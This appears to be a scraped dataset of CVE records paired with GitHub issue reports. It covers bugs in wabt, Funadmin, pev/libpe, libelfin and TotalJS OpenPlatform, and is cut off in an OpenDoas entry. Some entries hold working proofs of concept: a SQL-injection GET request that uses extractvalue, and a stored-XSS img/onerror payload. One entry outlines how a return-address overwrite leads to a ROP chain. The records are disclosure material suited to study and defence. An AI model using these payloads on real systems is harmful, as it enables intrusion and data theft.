std::is_move_constructible<wabt::Node>, std::is_move_assignable<wabt::Node>>::value, void>::type std::swap<wabt::Node>(wabt::Node&, wabt::Node&) /usr/lib/gcc/x86_64-linux-gnu/10/../../../../include/c++/10/bits/move.h:197:19 #3 0x5f501e in void std::iter_swap<__gnu_cxx::__normal_iterator<wabt::Node*, std::vector<wabt::Node, std::allocator<wabt::Node>>>, __gnu_cxx::__normal_iterator<wabt::Node*, std::vector<wabt::Node, std::allocator<wabt::Node>>>>(__gnu_cxx::__normal_iterator<wabt::Node*, std::vector<wabt::Node, std::allocator<wabt::Node>>>, __gnu_cxx::__normal_iterator<wabt::Node*, std::vector<wabt::Node, std::allocator<wabt::Node>>>) /usr/lib/gcc/x86_64-linux-gnu/10/../../../../include/c++/10/bits/stl_algobase.h:182:7 #4 0x5f46ed in __gnu_cxx::__normal_iterator<wabt::Node*, std::vector<wabt::Node, std::allocator<wabt::Node>>> std::_V2::__rotate<__gnu_cxx::__normal_iterator<wabt::Node*, std::vector<wabt::Node, std::allocator<wabt::Node>>>>(__gnu_cxx::__normal_iterator<wabt::Node*, std::vector<wabt::Node, std::allocator<wabt::Node>>>, __gnu_cxx::__normal_iterator<wabt::Node*, std::vector<wabt::Node, std::allocator<wabt::Node>>>, __gnu_cxx::__normal_iterator<wabt::Node*, std::vector<wabt::Node, std::allocator<wabt::Node>>>, std::random_access_iterator_tag) /usr/lib/gcc/x86_64-linux-gnu/10/../../../../include/c++/10/bits/stl_algo.h:1394:5 #5 0x5dd60f in __gnu_cxx::__normal_iterator<wabt::Node*, std::vector<wabt::Node, std::allocator<wabt::Node>>> std::_V2::rotate<__gnu_cxx::__normal_iterator<wabt::Node*, std::vector<wabt::Node, std::allocator<wabt::Node>>>>(__gnu_cxx::__normal_iterator<wabt::Node*, std::vector<wabt::Node, std::allocator<wabt::Node>>>, __gnu_cxx::__normal_iterator<wabt::Node*, std::vector<wabt::Node, std::allocator<wabt::Node>>>, __gnu_cxx::__normal_iterator<wabt::Node*, std::vector<wabt::Node, std::allocator<wabt::Node>>>) /usr/lib/gcc/x86_64-linux-gnu/10/../../../../include/c++/10/bits/stl_algo.h:1439:14 #6 0x5dd066 in wabt::AST::Construct(wabt::intrusive_list<wabt::Expr> const&, unsigned int, unsigned int, bool)::'lambda'(unsigned long)::operator()(unsigned long) const /wabt/out/clang/Debug/asan/../../../../src/decompiler-ast.h:279:11 #7 0x5c8556 in wabt::AST::Construct(wabt::intrusive_list<wabt::Expr> const&, unsigned int, unsigned int, bool) /wabt/out/clang/Debug/asan/../../../../src/decompiler-ast.h:307:13 #8 0x5ee577 in void wabt::AST::Block<(wabt::ExprType)8>(wabt::BlockExprBase<(wabt::ExprType)8> const&, wabt::LabelType) /wabt/out/clang/Debug/asan/../../../../src/decompiler-ast.h:159:5 #9 0x5dc2fd in wabt::AST::Construct(wabt::Expr const&) /wabt/out/clang/Debug/asan/../../../../src/decompiler-ast.h:212:9 #10 0x5c7b64 in wabt::AST::Construct(wabt::intrusive_list<wabt::Expr> const&, unsigned int, unsigned int, bool) /wabt/out/clang/Debug/asan/../../../../src/decompiler-ast.h:248:7 #11 0x5c281f in wabt::Decompiler::Decompile[abi:cxx11]() /wabt/out/clang/Debug/asan/../../../../src/decompiler.cc:795:13 #12 0x5be6bd in wabt::Decompile[abi:cxx11](wabt::Module const&, wabt::DecompileOptions const&) /wabt/out/clang/Debug/asan/../../../../src/decompiler.cc:854:21 #13 0x4f16bd in ProgramMain(int, char**) /wabt/out/clang/Debug/asan/../../../../src/tools/wasm-decompile.cc:103:18 #14 0x4f2101 in main /wabt/out/clang/Debug/asan/../../../../src/tools/wasm-decompile.cc:116:10 #15 0x7f9cae44d082 in __libc_start_main /build/glibc-SzIz7B/glibc-2.31/csu/../csu/libc-start.c:308:16 #16 0x43f04d in _start (/wabt/out/clang/Debug/asan/wasm-decompile+0x43f04d) 0x610000000010 is located 48 bytes to the left of 192-byte region [0x610000000040,0x610000000100) allocated by thread T0 here: #0 0x4edc5d in operator new(unsigned long) /home/build-user/llvm-project/compiler-rt/lib/asan/asan_new_delete.cpp:95:3 #1 0x5f05c8 in __gnu_cxx::new_allocator<wabt::Node>::allocate(unsigned long, void const*) /usr/lib/gcc/x86_64-linux-gnu/10/../../../../include/c++/10/ext/new_allocator.h:115:27 #2 0x5f0570 in std::allocator_traits<std::allocator<wabt::Node>>::allocate(std::allocator<wabt::Node>&, unsigned long) /usr/lib/gcc/x86_64-linux-gnu/10/../../../../include/c++/10/bits/alloc_traits.h:460:20 #3 0x5effaf in std::_Vector_base<wabt::Node, std::allocator<wabt::Node>>::_M_allocate(unsigned long) /usr/lib/gcc/x86_64-linux-gnu/10/../../../../include/c++/10/bits/stl_vector.h:346:20 #4 0x5f3462 in void std::vector<wabt::Node, std::allocator<wabt::Node>>::_M_realloc_insert<wabt::Node>(__gnu_cxx::__normal_iterator<wabt::Node*, std::vector<wabt::Node, std::allocator<wabt::Node>>>, wabt::Node&&) /usr/lib/gcc/x86_64-linux-gnu/10/../../../../include/c++/10/bits/vector.tcc:440:33 #5 0x5f3124 in wabt::Node& std::vector<wabt::Node, std::allocator<wabt::Node>>::emplace_back<wabt::Node>(wabt::Node&&) /usr/lib/gcc/x86_64-linux-gnu/10/../../../../include/c++/10/bits/vector.tcc:121:4 #6 0x5dcbdc in std::vector<wabt::Node, std::allocator<wabt::Node>>::push_back(wabt::Node&&) /usr/lib/gcc/x86_64-linux-gnu/10/../../../../include/c++/10/bits/stl_vector.h:1204:9 #7 0x5de429 in wabt::AST::InsertNode(wabt::NodeType, wabt::ExprType, wabt::Expr const*, unsigned int) /wabt/out/clang/Debug/asan/../../../../src/decompiler-ast.h:104:15 #8 0x5dc5d0 in wabt::AST::Construct(wabt::Expr const&) /wabt/out/clang/Debug/asan/../../../../src/decompiler-ast.h:230:9 #9 0x5c7b64 in wabt::AST::Construct(wabt::intrusive_list<wabt::Expr> const&, unsigned int, unsigned int, bool) /wabt/out/clang/Debug/asan/../../../../src/decompiler-ast.h:248:7 #10 0x5ee577 in void wabt::AST::Block<(wabt::ExprType)8>(wabt::BlockExprBase<(wabt::ExprType)8> const&, wabt::LabelType) /wabt/out/clang/Debug/asan/../../../../src/decompiler-ast.h:159:5 #11 0x5dc2fd in wabt::AST::Construct(wabt::Expr const&) /wabt/out/clang/Debug/asan/../../../../src/decompiler-ast.h:212:9 #12 0x5c7b64 in wabt::AST::Construct(wabt::intrusive_list<wabt::Expr> const&, unsigned int, unsigned int, bool) /wabt/out/clang/Debug/asan/../../../../src/decompiler-ast.h:248:7 #13 0x5c281f in wabt::Decompiler::Decompile[abi:cxx11]() /wabt/out/clang/Debug/asan/../../../../src/decompiler.cc:795:13 #14 0x5be6bd in wabt::Decompile[abi:cxx11](wabt::Module const&, wabt::DecompileOptions const&) /wabt/out/clang/Debug/asan/../../../../src/decompiler.cc:854:21 #15 0x4f16bd in ProgramMain(int, char**) /wabt/out/clang/Debug/asan/../../../../src/tools/wasm-decompile.cc:103:18 #16 0x4f2101 in main /wabt/out/clang/Debug/asan/../../../../src/tools/wasm-decompile.cc:116:10 #17 0x7f9cae44d082 in __libc_start_main /build/glibc-SzIz7B/glibc-2.31/csu/../csu/libc-start.c:308:16 SUMMARY: AddressSanitizer: heap-buffer-overflow /wabt/out/clang/Debug/asan/../../../../src/decompiler-ast.h:67:17 in wabt::Node::operator=(wabt::Node&&) Shadow bytes around the buggy address: 0x0c207fff7fb0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c207fff7fc0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c207fff7fd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c207fff7fe0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c207fff7ff0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 =>0x0c207fff8000: fa fa[fa]fa fa fa fa fa 00 00 00 00 00 00 00 00 0x0c207fff8010: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c207fff8020: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c207fff8030: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c207fff8040: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c207fff8050: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb ==1704949==ABORTING ```
heap overflow in wabt::Node::operator=(wabt::Node&&)
https://api.github.com/repos/WebAssembly/wabt/issues/1989/comments
1
2022-09-05T13:30:58Z
2023-03-17T12:04:27Z
https://github.com/WebAssembly/wabt/issues/1989
1,361,978,096
1,989
4,828
CVE-2023-24774
2023-03-10T13:15:11.033
Funadmin v3.2.0 was discovered to contain a SQL injection vulnerability via the selectFields parameter at \controller\auth\Auth.php.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Vendor Advisory" ], "url": "https://github.com/funadmin/funadmin/issues/12" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Vendor Advisory" ], "url": "https://github.com/funadmin/funadmin/issues/12" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:funadmin:funadmin:3.2.0:*:*:*:*:*:*:*", "matchCriteriaId": "CC800090-6420-4971-831D-1E77A18BD45E", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "89" ]
89
https://github.com/funadmin/funadmin/issues/12
[ "Exploit", "Issue Tracking", "Vendor Advisory" ]
github.com
[ "funadmin", "funadmin" ]
Vulnerability Product:funadmin Vulnerability version:.3.2.0 Vulnerability type:sql injection Vulnerability Details๏ผš Vulnerability location app\backend\controller\auth\Auth.php#adjust index method <img width="1225" alt="image" src="https://user-images.githubusercontent.com/122217858/215310156-128c1eb6-9516-42bf-b353-f36aa2c7c26f.png"> After getting the parameter selectFields here, continue to enter selectFields method app\common\traits\Curd.php#selectList <img width="1237" alt="image" src="https://user-images.githubusercontent.com/122217858/215310260-0edcca90-e252-401d-980b-ebff7e81838c.png"> Finally, enter \vendor\topthink\think-orm\src\db\BaseQuery.php#field is spliced โ€‹โ€‹into sql without filtering to cause sql injection Vulnerability reproduction: Background administrator rights poc `GET /backend/auth.Auth/index.html?parentField=pid&selectFields%5Bname%5D=extractvalue%281%2Cconcat%28char%28126%29%2Cuser()%29%29&selectFields%5Bvalue%5D=id&tree=true HTTP/1.1 Host: 192.168.3.129:8092 User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: zh-CN,zh;q=0.9 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Cookie: Hm_lvt_ce074243117e698438c49cd037b593eb=1673498041; PHPSESSID=591a908579ac738f0fc0f53d05c6aa51; think_lang=zh-cn; Hm_lvt_8dcaf664827c0e8ae52287ebb2411aed=1674888420; Hm_lpvt_8dcaf664827c0e8ae52287ebb2411aed=1674888420; auth_account=YToxOntzOjEyOiJhY2Nlc3NfdG9rZW4iO3M6MzI3OiJleUowZVhBaU9pSktWMVFpTENKaGJHY2lPaUpJVXpJMU5pSjkuZXlKdFpXMWlaWEpmYVdRaU9qRTFORGdzSW1Gd2NHbGtJam9pSWl3aVlYQndjMlZqY21WMElqb2lJaXdpYVhOeklqb2lhSFIwY0hNNkx5OTNkM2N1Wm5WdVlXUnRhVzR1WTI5dElpd2lZWFZrSWpvaWFIUjBjSE02THk5M2QzY3VablZ1WVdSdGFXNHVZMjl0SWl3aWMyTnZjR1Z6SWpvaWNtOXNaVjloWTJObGMzTWlMQ0pwWVhRaU9qRTJOelE0T0RrMU1EQXNJbTVpWmlJNk1UWTNORGc0T1RVd01Dd2laWGh3SWpveE5qYzFOVGd3TnpBd2ZRLkJITHd5WU5nNkpVVUZmMFFucGM0aHk2YlZ1c1V6WkVqR3N2SElva0pxYU0iO30%3D; clound_account=YTo0OntzOjI6ImlkIjtpOjE1NDg7czo4OiJ1c2VybmFtZSI7czoxMDoibXlmdW5hZG1pbiI7czo4OiJuaWNrbmFtZSI7czowOiIiO3M6NjoiYXZhdGFyIjtzOjM2OiIvc3RhdGljL2Zyb250ZW5kL2ltYWdlcy9hdmF0YXIvNi5qcGciO30%3D X-Requested-With: XMLHttpRequest Accept-Encoding: gzip` <img width="1191" alt="image" src="https://user-images.githubusercontent.com/122217858/215310269-ce1ebc6a-ff50-4f4f-9a8c-0b17b889abac.png">
auth.Auth#selectFields[name] has sql injection vulnerability
https://api.github.com/repos/funadmin/funadmin/issues/12/comments
1
2023-01-29T06:54:20Z
2023-05-05T06:40:42Z
https://github.com/funadmin/funadmin/issues/12
1,561,152,964
12
4,829
CVE-2021-45423
2023-03-13T18:15:12.553
A Buffer Overflow vulnerabilityexists in Pev 0.81 via the pe_exports function from exports.c.. The array offsets_to_Names is dynamically allocated on the stack using exp->NumberOfFunctions as its size. However, the loop uses exp->NumberOfNames to iterate over it and set its components value. Therefore, the loop code assumes that exp->NumberOfFunctions is greater than ordinal at each iteration. This can lead to arbitrary code execution.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Vendor Advisory" ], "url": "https://github.com/merces/libpe/issues/35" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Vendor Advisory" ], "url": "https://github.com/merces/libpe/issues/35" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:pev_project:pev:0.81:*:*:*:*:*:*:*", "matchCriteriaId": "137049BB-7F2D-433A-8809-A4CE073CC14D", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "120" ]
120
https://github.com/merces/libpe/issues/35
[ "Exploit", "Vendor Advisory" ]
github.com
[ "merces", "libpe" ]
Hello guys. I have found a bug on `pe_exports` function from `exports.c` which allows me to exploit `readpe.exe` program from `pev 0.81` (last release). The issue occurs on the following lines: https://github.com/merces/libpe/blob/07f90de4e5cc6f7aff8e8b62ca1a39804907848f/exports.c#L104-L132 The array `offsets_to_Names` is dynamically allocated on the stack using `exp->NumberOfFunctions` as its size (line 104). However, the loop starting at line 111 uses `exp->NumberOfNames` to iterate over it and set values at line 132. Therefore, this snippet assumes that `exp->NumberOfFunctions` is greater than `ordinal` at each iteration. That condition may be followed by compilers, but not by hackers. What happens if I craft a PE file with `ordinal` greater than or equal to `exp->NumberOfFunctions`? Depending on the values, I am able to overwrite the return address of `pe_exports` function. On Windows 7 and Windows Server 2008 (systems on which I could produce higher impact), I may even use a ROP chain to get an arbitrary code execution. I have recorded a PoC video to proof the exploitability of the bug on `readpe.exe`: https://drive.google.com/file/d/1zBH9ykgmHlnWQEBDIxwrYG8CTrHtUf26/view?usp=sharing. If you guys need any more details about the bug, I am at your disposal!
Exploitable bug on pe_exports function from exports.c
https://api.github.com/repos/merces/libpe/issues/35/comments
0
2021-05-30T18:00:30Z
2021-08-19T00:29:12Z
https://github.com/merces/libpe/issues/35
906,834,099
35
4,830
CVE-2023-24180
2023-03-14T14:15:13.217
Libelfin v0.3 was discovered to contain an integer overflow in the load function at elf/mmap_loader.cc. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted elf file.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/aclements/libelfin/issues/75" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/aclements/libelfin/issues/75" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:libelfin_project:libelfin:0.3:*:*:*:*:*:*:*", "matchCriteriaId": "B18704CF-84AF-4699-BA52-8974DFE68BC7", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "190" ]
190
https://github.com/aclements/libelfin/issues/75
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "aclements", "libelfin" ]
found integer overflow bug by source code audit,i just found integer overflow at function load(...) which return pointer on mmap address. var `offset` and `size` can assumed as `u64` so in this case, if offset and size big enough,it may cause Addition overflow and return a pointer points to invalid address. mmap_loader.cc:48: ``` const void *load(off_t offset, size_t size) { if (offset + size > lim) // integer overflow here throw range_error("offset exceeds file size"); return (const char*)base + offset; } ``` here a sample: [a.zip](https://github.com/aclements/libelfin/files/10413869/a.zip) which i just modify the offset of program_head to -1(0xffffffffffffffff) ``` $readelf -h a ELF Header: Magic: 7f 45 4c 46 02 01 01 00 00 00 00 00 00 00 00 00 Class: ELF64 Data: 2's complement, little endian Version: 1 (current) OS/ABI: UNIX - System V ABI Version: 0 Type: EXEC (Executable file) Machine: Advanced Micro Devices X86-64 Version: 0x1 Entry point address: 0x401040 Start of program headers: -1 (bytes into file) // modify offset here Start of section headers: 23000 (bytes into file) Flags: 0x0 Size of this header: 64 (bytes) Size of program headers: 56 (bytes) Number of program headers: 13 Size of section headers: 64 (bytes) Number of section headers: 31 Section header string table index: 30 readelf: a: Error: Reading 728 bytes extends past end of file for program headers ``` use `./dump-segments a` ![Screenshot from 2023-01-14 01-26-41](https://user-images.githubusercontent.com/7191056/212381696-dba567c4-fb39-4945-b060-6bb9fecb393a.png) and this is a batch problem at elf.cc which cause segmentation violation ``` elf/elf.cc 70,44: } *core_hdr = (struct core_hdr*)l->load(0, sizeof *core_hdr); 87,30: const void *hdr = l->load(0, hdr_size); 97,35: const void *seg_data = l->load(m->hdr.phoff, 105,35: const void *sec_data = l->load(m->hdr.shoff, 191,46: m->data = m->f.get_loader()->load(m->hdr.offset, 270,46: m->data = m->f.get_loader()->load(m->hdr.offset, m->hdr.size); ``` An attacker can exploit this vulnerability by submitting a malicious elf file that exploits this bug which will result in a Denial of Service (DoS).
found integer overflow bugs
https://api.github.com/repos/aclements/libelfin/issues/75/comments
2
2023-01-13T17:42:54Z
2023-10-27T23:25:47Z
https://github.com/aclements/libelfin/issues/75
1,532,688,338
75
4,831
CVE-2023-27069
2023-03-14T16:15:10.493
A stored cross-site scripting (XSS) vulnerability in TotalJS OpenPlatform commit b80b09d allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the account name field.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.4, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.3, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.4, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.3, "impactScore": 2.7, "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/totaljs/openplatform/issues/52" }, { "source": "cve@mitre.org", "tags": null, "url": "https://www.edoardoottavianelli.it/CVE-2023-27069/" }, { "source": "cve@mitre.org", "tags": [ "Exploit" ], "url": "https://www.youtube.com/watch?v=Ryuz1gymiw8" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/totaljs/openplatform/issues/52" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://www.edoardoottavianelli.it/CVE-2023-27069/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit" ], "url": "https://www.youtube.com/watch?v=Ryuz1gymiw8" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:totaljs:openplatform:2023-02-16:*:*:*:*:node.js:*:*", "matchCriteriaId": "D313B0AF-B179-462A-B6FD-E006FA2676DA", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/totaljs/openplatform/issues/52
[ "Exploit", "Issue Tracking" ]
github.com
[ "totaljs", "openplatform" ]
Tested version: [b80b09d](https://github.com/totaljs/openplatform/commit/b80b09d1e12ada675d0cbb6d9c4af9e5a8097751) (latest) Steps to reproduce the vulnerability: - Login in the application. - Click on user profile picture in the right corner below. - Click My Account - Set `"><img src=x onerror=alert(document.domain)>` as account name and save. - XSS fires. - Each time a target will visit the dashboard the payload will fire, even if the target is not logged in! In order to test this, just click logout and reload the page. ![poc1](https://user-images.githubusercontent.com/35783570/219962334-712f0352-c9c5-47f3-8401-82a877f39826.png) ![poc2](https://user-images.githubusercontent.com/35783570/219962337-b083e414-c380-445b-8b24-3f8aeab4b4a3.png)
[Security] Stored XSS in account name
https://api.github.com/repos/totaljs/openplatform/issues/52/comments
4
2023-02-19T16:50:10Z
2023-02-19T21:34:13Z
https://github.com/totaljs/openplatform/issues/52
1,590,761,960
52
4,832
CVE-2023-27070
2023-03-14T16:15:10.553
A stored cross-site scripting (XSS) vulnerability in TotalJS OpenPlatform commit b80b09d allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the platform name field.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.4, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.3, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.4, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.3, "impactScore": 2.7, "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/totaljs/openplatform/issues/53" }, { "source": "cve@mitre.org", "tags": null, "url": "https://www.edoardoottavianelli.it/CVE-2023-27070/" }, { "source": "cve@mitre.org", "tags": [ "Exploit" ], "url": "https://www.youtube.com/watch?v=4WJqcseH5qk" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/totaljs/openplatform/issues/53" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://www.edoardoottavianelli.it/CVE-2023-27070/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit" ], "url": "https://www.youtube.com/watch?v=4WJqcseH5qk" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:totaljs:openplatform:2023-02-16:*:*:*:*:node.js:*:*", "matchCriteriaId": "D313B0AF-B179-462A-B6FD-E006FA2676DA", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/totaljs/openplatform/issues/53
[ "Exploit", "Issue Tracking" ]
github.com
[ "totaljs", "openplatform" ]
Tested version: [b80b09d](https://github.com/totaljs/openplatform/commit/b80b09d1e12ada675d0cbb6d9c4af9e5a8097751) (latest) Steps to reproduce the vulnerability: - Login in the application. - Click on setup. - Click on settings. - Set `"><img src=x onerror=alert(document.domain)>` as platform name and save. - Logout and XSS will fire. ![poc1](https://user-images.githubusercontent.com/35783570/219962855-8f153a15-45c6-45d8-93d3-f58e61e2fcf9.png) ![poc2](https://user-images.githubusercontent.com/35783570/219962858-0e482b0a-2504-4e3e-b6b0-b82b69f2df75.png)
[Security] Stored XSS in platform name
https://api.github.com/repos/totaljs/openplatform/issues/53/comments
5
2023-02-19T17:01:41Z
2023-02-23T12:04:02Z
https://github.com/totaljs/openplatform/issues/53
1,590,770,441
53
4,833
CVE-2023-28339
2023-03-14T19:15:10.717
OpenDoas through 6.8.2, when TIOCSTI is available, allows privilege escalation because of sharing a terminal with the original session. NOTE: TIOCSTI is unavailable in OpenBSD 6.0 and later, and can be made unavailable in the Linux kernel 6.2 and later.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 5.9, "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary" } ], "cvssMetricV40": null }
